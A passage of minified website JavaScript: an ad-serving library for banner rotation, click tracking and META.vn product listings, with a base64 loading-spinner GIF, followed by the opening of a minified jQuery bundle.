n=location.pathname,t=n.lastIndexOf("/");return t>=0?n.substring(0,t):n}function __getThirdPartyClickLink(n,t,i){return n!=""?n.indexOf("?")>=0?n+"&banner="+t+"&from="+escape(__hostName())+"&path="+escape(__pathName())+"&url="+escape(i):n+"?banner="+t+"&from="+escape(__hostName())+"&path="+escape(__pathName())+"&url="+escape(i):i}function __getClickLink(n){return AD_CLICK_PATH.indexOf("?")>=0?AD_CLICK_PATH+"&domain="+__hostName()+"&type=click&banner="+n+"&res="+screen.width+"x"+screen.height:AD_CLICK_PATH+"?domain="+__hostName()+"&type=click&banner="+n+"&res="+screen.width+"x"+screen.height}function __onClick(n){__getEL("MetaNET_Click").innerHTML="<img src='"+__getClickLink(n)+"' border=0 width='1' height='1'/>"}function __getViewLink(){return AD_BLANK_GIF}function IS_NO_LINK(n){return n==""||n=="#"||n=="javascript:void(0);"||n=="about:blank"||typeof n=="undefined"}function GET_ONE_AD(n){return document.getElementById("MetaNET_ADV_NUMBER_"+n)}function GET_ALL_AD(){var n=[];for(i=1;i<=AD_COUNT;i++)n[length]=GET_ONE_AD(i);return n}function __getCookie(n){var i,t;for(ckA=document.cookie.split(";"),i="",t=0;t<ckA.length;t++)if(p=ckA[t].split("="),p[0]=p[0].replace(/^\s+/g,""),p[0]==n)return p[1];return i}function __setCookie(n,t,i){var r,u;i?(r=new Date,r.setTime(r.getTime()+i*864e5),u="; expires="+r.toGMTString()):u="";document.cookie=n+"="+t+u+"; path=/"}function eraseCookie(n){__setCookie(n,"",-1)}function __setOpacity(n,t){try{t>100&&(t=100);t<1&&(t=t*100);n.style.opacity=t/100;n.style.filter="alpha(opacity='"+t+"')"}catch(i){}}function __IsNull(n){return typeof n=="undefined"||n==null}function __RepIfNull(n,t){return typeof t=="undefined"||t==null?n:t}function __RepIfNullElse(n,t,i){return typeof i=="undefined"||i==null?n:i}function MetaNET_AdObject(n){var t;AD_COUNT++;this.__id=AD_COUNT;this.Id="MetaNET_ADV_NUMBER_"+AD_COUNT;this.name=__RepIfNull(this.Id,n.name);this.imageUrl=__RepIfNull("",n.imageUrl);this.linkUrl=__RepIfNull("#",n.linkUrl);this.title=__RepIfNull("",n.title);this.domain=__RepIfNull("",n.domain);this.desc=__RepIfNull("",n.desc);this.width=__RepIfNull(0,n.width);this.height=__RepIfNull(0,n.height);this.cssClass=__RepIfNullElse(""," class='"+n.cssClass+"'",n.cssClass);this.style=__RepIfNullElse(""," style='"+n.style+"'",n.style);this.target=__RepIfNull("_blank",n.target);this.wmode=__RepIfNull("transparent",n.wmode);this.onclick=__RepIfNull("",n.onclick);this.__style=this.style==""?"":__RepIfNull("",n.style);this.enableThirdPartyClick=__RepIfNull(!1,n.enableThirdPartyClick);this.thirdPartyClickUrl=__RepIfNull(AD_THIRD_PARTY_CLICK_PATH,n.thirdPartyClickUrl);this.onMouseOut=__RepIfNull("",n.onMouseOut);this.onMouseOver=__RepIfNull("",n.onMouseOver);this.enableThirdPartyClick&&this.thirdPartyClickUrl!=""&&!IS_NO_LINK(this.linkUrl)&&(this.linkUrl=__getThirdPartyClickLink(this.thirdPartyClickUrl,this.name,this.linkUrl));__IsNull(n.adType)?(t=new String(this.imageUrl),t=t.toLowerCase(),this.adType=t.lastIndexOf(".swf")>=0?AD_TYPE_FLASH:t.lastIndexOf(".gif")>=0||t.lastIndexOf(".jpg")>=0||t.lastIndexOf(".png")>=0?AD_TYPE_IMAGE:t.lastIndexOf(".htm")>=0||t.lastIndexOf(".asp")>=0||t.lastIndexOf(".php")>=0||t.lastIndexOf(".html")>=0||t.lastIndexOf(".aspx")>=0||t.lastIndexOf(".ashx")>=0?AD_TYPE_HTML:AD_TYPE_TEXT):this.adType=n.adType}function MetaNET_ExAdObject(n){if(n.lenght=2)AD_EX_COUNT++,this.Id="MetaNET_EXADV_NUMBER_"+AD_COUNT,this.collapseAd=n[0],this.expandAd=n[1],this.widthMin=this.collapseAd.width,this.widthMax=this.expandAd.width,this.heightMin=this.collapseAd.height,this.heightMax=this.expandAd.height,this.mode=0,this.showButtons=!1,this.closeFunction=this.Id+"__close();",this.expandFunction=this.Id+"__expand();",this.collapseFunction=this.Id+"__collapse();",this.__interval=5;else return!1}function MetaNET_SharingAdObject(n,t){var r;for(AD_SHARING_COUNT++,this.Id="MetaNET_SHARING_AD_NUMBER_"+AD_SHARING_COUNT,this.adObjects=[],r=0,this.width="auto",this.height="auto",i=0;i<t.length;i++)this.adObjects[i]=t[i];this.interval=n;this.length=t.length;this.currentAdId=0;this.direction="DOC";this.padding="0"}function MetaNET_SharingAdObject2(n,t){var u,r;for(AD_SHARING_COUNT++,this.Id="MetaNET_SHARING_AD_NUMBER_"+AD_SHARING_COUNT,this.adObjects=[],u=0,i=0;i<t.length;i++)this.adObjects[i]=t[i];this.interval=n;this.length=t.length;this.currentAdId=__getCookie(this.Id)==""||__getCookie(this.Id)==null?Math.floor(Math.random()*(this.length+1)):parseInt(__getCookie(this.Id))+1;this.currentAdId>=this.length&&(this.currentAdId=0);__setCookie(this.Id,this.currentAdId,1);this.direction="DOC";this.padding="0";this.width="auto";this.height="auto";r=this.direction.toLowerCase();r=="doc"||r=="vertical"||r=="d"||r=="0"?(this.padding="0")&&(this.padding="3"):(r=="n"||r=="horizontal"||r=="ngang"||r=="1")&&(this.padding="0")&&(this.padding="3")}function showAds(n,t,i,r){var u=new MetaNET_AdObject({imageUrl:i,linkUrl:r,width:n,height:t});u.renderOut()}function showSharingAds(n,t,i,r){for(var s,e=r.split("|"),o=[],f,u=0;u<e.length;u++)f=e[u].split("->"),o[u]=new MetaNET_AdObject({imageUrl:f[0],linkUrl:f[1],width:t,height:i});s=new MetaNET_SharingAdObject(n,o);s.renderOut()}function showExpandAds(n,t,i,r,u,f,e){var o=MetaNET_ExAdObject([new MetaNET_AdObject({imageUrl:u,linkUrl:e,width:n,height:t}),new MetaNET_AdObject({imageUrl:f,linkUrl:e,width:i,height:r})]);o.renderOut()}function loadMetaAds(n,t){function r(n){var i=n.url+"?ref="+u,r=n.categoryUrl+"?ref="+u,t="";return n.title&&(t+=n.title),n._listPrice?(t+='<span class="adx-text"><span class="adx-text-title">Giá thị trường:<\/span><span class="adx-text-value strock">'+n._listPrice+"<\/span><\/span>",t+='<span class="adx-text"><span class="adx-text-title">Giá META:<\/span><span class="adx-text-value highlight">'+n._unitCost+"<\/span><\/span>",t+='<span class="adx-text"><span class="adx-text-title">Tiết kiệm:<\/span><span class="adx-text-value highlight2">'+n._savePrice+"<\/span><\/span>"):n._unitCost&&(t+='<span class="adx-text"><span class="adx-text-title">Giá bán:<\/span><span class="adx-text-value highlight">'+n._unitCost+"<\/span><\/span>"),'<div class="breview-box"><p class="adx-item adx-title"><a rel="nofollow" href="'+i+'" target="_blank">'+n.name+'<\/a><\/p> <div class="adx-body"><p class="adx-item adx-image small"><a rel="nofollow" href="'+i+'" target="_blank"><img src="'+n.thumb+'" border="0" alt=""><\/a><\/p><div class="adx-item adx-content"><p>'+t+'<\/p><p class="adx-item adx-domain"><a rel="nofollow" href="'+i+'" target="_blank" class="lnk-domain">META.vn<\/a> | <a rel="nofollow" href="'+r+'" target="_blank" class="lnk-catalog">'+n.categories+"<\/a><\/p><\/div><\/div><\/div>"}var i;t||(t={});var f=t.keywords||n.data("keywords")||n.data("kw")||"",e=t.ids||n.data("ids")||n.data("id")||"",o=t.top||n.data("top")||5,u=t.ref||n.data("ref")||"textlink",s=t.min||n.data("min")||"-",h=t.max||n.data("max")||"-",c=t.dir||n.data("dir")||"ver",l=t.ajx||n.data("ajx")||"/ajx/Ajx_TopProducts2.aspx";n.html('<img src="data:image/gif;base64,R0lGODlhQABAAPcAAIDF3b/i7pXP4+r1+arY6NTs9FWy0mu710SqzWi617zg7f3+/kiszvj8/VCw0Ov2+o/M4ez2+vL5/Pb7/eLy91y109ft9Pz+/ozK4PT6/Mrn8UKpzXTA2s7p8oLG3t7w9lay0ozL4K7a6f7+/6LV5vv9/qTV51+21JbP40+v0Eytz0OpzeDx99Pr8+b0+EWqzUGozHG+2afX53nC21q007vg7ebz+Pn8/XrC2+/3+3O/2qPV5pPO4sjm8HC+2dbs9Nru9e73+u/4+57T5WK31WG31ff7/fL5+8vn8YvK4NTr81mz07rg7Wy82HjC21Kw0bHc6lGw0f7///P6/On1+bnf7PX6/F621KHU5pLO4sXk7+f0+Z3S5cbl8Nzv9uPy+OTz+Nnu9bLc6vr9/me61sDi7sXl8Njt9bDb6lm007jf7MLj79Xs9H/F3a3a6fH5++Xz+JnR5NDq8nK/2ZjQ4/D4++33+pjQ5F211KfX6Oj0+YbI35vS5N/w9pfQ42+92c7o8vX7/LPd69Hq81y11Mnm8a/a6o3L4d3v9oPH3o7L4Vez0qjX6KvZ6bTd68/p8nG/2bbe7Fiz0r3h7bPc6+Py94nJ38Pk78zo8YnJ4IrK4K3Z6Wu82Mfl8MHj7nXA2lu007be60CozP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH/C05FVFNDQVBFMi4wAwEAAAAh/wtYTVAgRGF0YVhNUDw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNiAoTWFjaW50b3NoKSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDowMDA3NTlEOTk4REYxMUUzQTY5NkRERDBGNjQ2NTNFMiIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDowMDA3NTlEQTk4REYxMUUzQTY5NkRERDBGNjQ2NTNFMiI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN0YW5jZUlEPSJ4bXAuaWlkOjA4MTUwMjlFOThERDExRTNBNjk2REREMEY2NDY1M0UyIiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjAwMDc1OUQ4OThERjExRTNBNjk2REREMEY2NDY1M0UyIi8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+Af/+/fz7+vn49/b19PPy8fDv7u3s6+rp6Ofm5eTj4uHg397d3Nva2djX1tXU09LR0M/OzczLysnIx8bFxMPCwcC/vr28u7q5uLe2tbSzsrGwr66trKuqqainpqWko6KhoJ+enZybmpmYl5aVlJOSkZCPjo2Mi4qJiIeGhYSDgoGAf359fHt6eXh3dnV0c3JxcG9ubWxramloZ2ZlZGNiYWBfXl1cW1pZWFdWVVRTUlFQT05NTEtKSUhHRkVEQ0JBQD8+PTw7Ojk4NzY1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"/>');i=n.data("item-width");$.get(l,{top:o,kw:f,ids:e,min:s,max:h},function(t){var f,s,e,h,o,u,l;if(n.empty(),f=$('<div class="adx-zone"><\/div>'),f.appendTo(n),s=t.length,c=="hor")for(f.addClass("adx-horizontal"),e=$('<div class="adx-row"><\/div>'),e.appendTo(f),u=0;u<s;u++)h=t[u],o=$('<div class="adx-cell"><\/div>'),i&&o.css({width:i}),o.appendTo(e),o.html(r(h));else for(f.addClass("adx-vertical"),u=0;u<s;u++){var h=t[u],e=$('<div class="adx-row"><\/div>'),o=$('<div class="adx-cell"><\/div>');e.appendTo(f);o.appendTo(e);u<s-1&&(l=$('<div class="adx-sep-h"><\/div>'),l.insertAfter(e));o.html(r(h))}},"json").error(function(){n.empty()})}var slice,gamebox,AD_BG_START,MetaNET_BgAds_Settings;!function(n,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=n.document?t(n,!0):function(n){if(!n.document)throw new Error("jQuery requires a window with a document");return t(n)}:t(n)}("undefined"!=typeof window?window:this,function(n,t){"use strict";function hr(n,t,i){var r,u=(t=t||f).createElement("script");if(u.text=n,i)for(r in df)i[r]&&(u[r]=i[r]);t.head.appendChild(u).parentNode.removeChild(u)}function it(n){return null==n?n+"":"object"==typeof n||"function"==typeof n?bt[or.call(n)]||"object":typeof n}function hi(n){var t=!!n&&"length"in n&&n.length,i=it(n);return!u(n)&&!tt(n)&&("array"===i||0===t||"number"==typeof t&&t>0&&t-1 in n)}function v(n,t){return n.nodeName&&n.nodeName.toLowerCase()===t.toLowerCase()}function li(n,t,r){return u(t)?i.grep(n,function(n,i){return!!t.call(n,i,n)!==r}):t.nodeType?i.grep(n,function(n){return n===t!==r}):"string"!=typeof t?i.grep(n,function(n){return wt.call(t,n)>-1!==r}):i.filter(t,n,r)}function wr(n,t){while((n=n[t])&&1!==n.nodeType);return n}function ne(n){var t={};return i.each(n.match(l)||[],function(n,i){t[i]=!0}),t}function ut(n){return n}function dt(n){throw n;}function br(n,t,i,r){var f;try{n&&u(f=n.promise)?f.call(n).done(t).fail(i):n&&u(f=n.then)?f.call(n,t,i):t.apply(void 0,[n].slice(r))}catch(n){i.apply(void 0,[n])}}function ni(){f.removeEventListener("DOMContentLoaded",ni);n.removeEventListener("load",ni);i.ready()}function re(n,t){return t.toUpperCase()}function y(n){return n.replace(te,"ms-").replace(ie,re)}function at(){this.expando=i.expando+at.uid++}function ee(n){return"true"===n||"false"!==n&&("null"===n?null:n===+n+""?+n:ue.test(n)?JSON.parse(n):n)}function dr(n,t,i){var r;if(void 0===i&&1===n.nodeType)if(r="data-"+t.replace(fe,"-$&").toLowerCase(),"string"==typeof(i=n.getAttribute(r))){try{i=ee(i)}catch(n){}o.set(n,t,i)}else i=void 0;return i}function tu(n,t,r,u){var s,h,c=20,l=u?function(){return u.cur()}:function(){return i.css(n,t,"")},o=l(),e=r&&r[3]||(i.cssNumber[t]?"":"px"),f=(i.cssNumber[t]||"px"!==e&&+o)&&vt.exec(i.css(n,t));if(f&&f[3]!==e){for(o/=2,e=e||f[3],f=+o||1;c--;)i.style(n,t,f+e),(1-h)*(1-(h=l()/o||.5))<=0&&(c=0),f/=h;f*=2;i.style(n,t,f+e);r=r||[]}return r&&(f=+f||+o||0,s=r[1]?f+(r[1]+1)*r[2]:+r[2],u&&(u.unit=e,u.start=f,u.end=s)),s}function oe(n){var r,f=n.ownerDocument,u=n.nodeName,t=ai[u];return t||(r=f.body.appendChild(f.createElement(u)),t=i.css(r,"display"),r.parentNode.removeChild(r),"none"===t&&(t="block"),ai[u]=t,t)}function ft(n,t){for(var e,u,f=[],i=0,o=n.length;i<o;i++)(u=n[i]).style&&(e=u.style.display,t?("none"===e&&(f[i]=r.get(u,"display")||null,f[i]||(u.style.display="")),""===u.style.display&&ti(u)&&(f[i]=oe(u))):"none"!==e&&(f[i]="none",r.set(u,"display",e)));for(i=0;i<o;i++)null!=f[i]&&(n[i].style.display=f[i]);return n}function s(n,t){var r;return r="undefined"!=typeof n.getElementsByTagName?n.getElementsByTagName(t||"*"):"undefined"!=typeof n.querySelectorAll?n.querySelectorAll(t||"*"):[],void 0===t||t&&v(n,t)?i.merge([n],r):r}function vi(n,t){for(var i=0,u=n.length;i<u;i++)r.set(n[i],"globalEval",!t||r.get(t[i],"globalEval"))}function eu(n,t,r,u,f){for(var e,o,p,a,w,v,h=t.createDocumentFragment(),y=[],l=0,b=n.length;l<b;l++)if((e=n[l])||0===e)if("object"===it(e))i.merge(y,e.nodeType?[e]:e);else if(fu.test(e)){for(o=o||h.appendChild(t.createElement("div")),p=(ru.exec(e)||["",""])[1].toLowerCase(),a=c[p]||c._default,o.innerHTML=a[1]+i.htmlPrefilter(e)+a[2],v=a[0];v--;)o=o.lastChild;i.merge(y,o.childNodes);(o=h.firstChild).textContent=""}else y.push(t.createTextNode(e));for(h.textContent="",l=0;e=y[l++];)if(u&&i.inArray(e,u)>-1)f&&f.push(e);else if(w=i.contains(e.ownerDocument,e),o=s(h.appendChild(e),"script"),w&&vi(o),r)for(v=0;e=o[v++];)uu.test(e.type||"")&&r.push(e);return h}function ri(){return!0}function et(){return!1}function su(){try{return f.activeElement}catch(n){}}function yi(n,t,r,u,f,e){var o,s;if("object"==typeof t){"string"!=typeof r&&(u=u||r,r=void 0);for(s in t)yi(n,s,r,u,t[s],e);return n}if(null==u&&null==f?(f=r,u=r=void 0):null==f&&("string"==typeof r?(f=u,u=void 0):(f=u,u=r,r=void 0)),!1===f)f=et;else if(!f)return n;return 1===e&&(o=f,(f=function(n){return i().off(n),o.apply(this,arguments)}).guid=o.guid||(o.guid=i.guid++)),n.each(function(){i.event.add(this,t,f,u,r)})}function hu(n,t){return v(n,"table")&&v(11!==t.nodeType?t:t.firstChild,"tr")?i(n).children("tbody")[0]||n:n}function ye(n){return n.type=(null!==n.getAttribute("type"))+"/"+n.type,n}function pe(n){return"true/"===(n.type||"").slice(0,5)?n.type=n.type.slice(5):n.removeAttribute("type"),n}function cu(n,t){var u,c,f,s,h,l,a,e;if(1===t.nodeType){if(r.hasData(n)&&(s=r.access(n),h=r.set(t,s),e=s.events)){delete h.handle;h.events={};for(f in e)for(u=0,c=e[f].length;u<c;u++)i.event.add(t,f,e[f][u])}o.hasData(n)&&(l=o.access(n),a=i.extend({},l),o.set(t,a))}}function we(n,t){var i=t.nodeName.toLowerCase();"input"===i&&iu.test(n.type)?t.checked=n.checked:"input"!==i&&"textarea"!==i||(t.defaultValue=n.defaultValue)}function ot(n,t,f,o){t=er.apply([],t);var l,w,a,v,h,b,c=0,y=n.length,d=y-1,p=t[0],k=u(p);if(k||y>1&&"string"==typeof p&&!e.checkClone&&ae.test(p))return n.each(function(i){var r=n.eq(i);k&&(t[0]=p.call(this,i,r.html()));ot(r,t,f,o)});if(y&&(l=eu(t,n[0].ownerDocument,!1,n,o),w=l.firstChild,1===l.childNodes.length&&(l=w),w||o)){for(v=(a=i.map(s(l,"script"),ye)).length;c<y;c++)h=l,c!==d&&(h=i.clone(h,!0,!0),v&&i.merge(a,s(h,"script"))),f.call(n[c],h,c);if(v)for(b=a[a.length-1].ownerDocument,i.map(a,pe),c=0;c<v;c++)h=a[c],uu.test(h.type||"")&&!r.access(h,"globalEval")&&i.contains(b,h)&&(h.src&&"module"!==(h.type||"").toLowerCase()?i._evalUrl&&i._evalUrl(h.src):hr(h.textContent.replace(ve,""),b,h))}return n}function lu(n,t,r){for(var u,e=t?i.filter(t,n):n,f=0;null!=(u=e[f]);f++)r||1!==u.nodeType||i.cleanData(s(u)),u.parentNode&&(r&&i.contains(u.ownerDocument,u)&&vi(s(u,"script")),u.parentNode.removeChild(u));return n}function yt(n,t,r){var o,s,h,f,u=n.style;return(r=r||ui(n))&&(""!==(f=r.getPropertyValue(t)||r[t])||i.contains(n.ownerDocument,n)||(f=i.style(n,t)),!e.pixelBoxStyles()&&pi.test(f)&&be.test(t)&&(o=u.width,s=u.minWidth,h=u.maxWidth,u.minWidth=u.maxWidth=u.width=f,f=r.width,u.width=o,u.minWidth=s,u.maxWidth=h)),void 0!==f?f+"":f}function au(n,t){return{get:function(){if(!n())return(this.get=t).apply(this,arguments);delete this.get}}}function ge(n){if(n in wu)return n;for(var i=n[0].toUpperCase()+n.slice(1),t=pu.length;t--;)if((n=pu[t]+i)in wu)return n}function bu(n){var t=i.cssProps[n];return t||(t=i.cssProps[n]=ge(n)||n),t}function ku(n,t,i){var r=vt.exec(t);return r?Math.max(0,r[2]-(i||0))+(r[3]||"px"):t}function wi(n,t,r,u,f,e){var o="width"===t?1:0,h=0,s=0;if(r===(u?"border":"content"))return 0;for(;o<4;o+=2)"margin"===r&&(s+=i.css(n,r+w[o],!0,f)),u?("content"===r&&(s-=i.css(n,"padding"+w[o],!0,f)),"margin"!==r&&(s-=i.css(n,"border"+w[o]+"Width",!0,f))):(s+=i.css(n,"padding"+w[o],!0,f),"padding"!==r?s+=i.css(n,"border"+w[o]+"Width",!0,f):h+=i.css(n,"border"+w[o]+"Width",!0,f));return!u&&e>=0&&(s+=Math.max(0,Math.ceil(n["offset"+t[0].toUpperCase()+t.slice(1)]-e-s-h-.5))),s}function du(n,t,r){var f=ui(n),u=yt(n,t,f),s="border-box"===i.css(n,"boxSizing",!1,f),o=s;if(pi.test(u)){if(!r)return u;u="auto"}return o=o&&(e.boxSizingReliable()||u===n.style[t]),("auto"===u||!parseFloat(u)&&"inline"===i.css(n,"display",!1,f))&&(u=n["offset"+t[0].toUpperCase()+t.slice(1)],o=!0),(u=parseFloat(u)||0)+wi(n,t,r||(s?"border":"content"),o,f,u)+"px"}function h(n,t,i,r,u){return new h.prototype.init(n,t,i,r,u)}function bi(){fi&&(!1===f.hidden&&n.requestAnimationFrame?n.requestAnimationFrame(bi):n.setTimeout(bi,i.fx.interval),i.fx.tick())}function tf(){return n.setTimeout(function(){st=void 0}),st=Date.now()}function ei(n,t){var 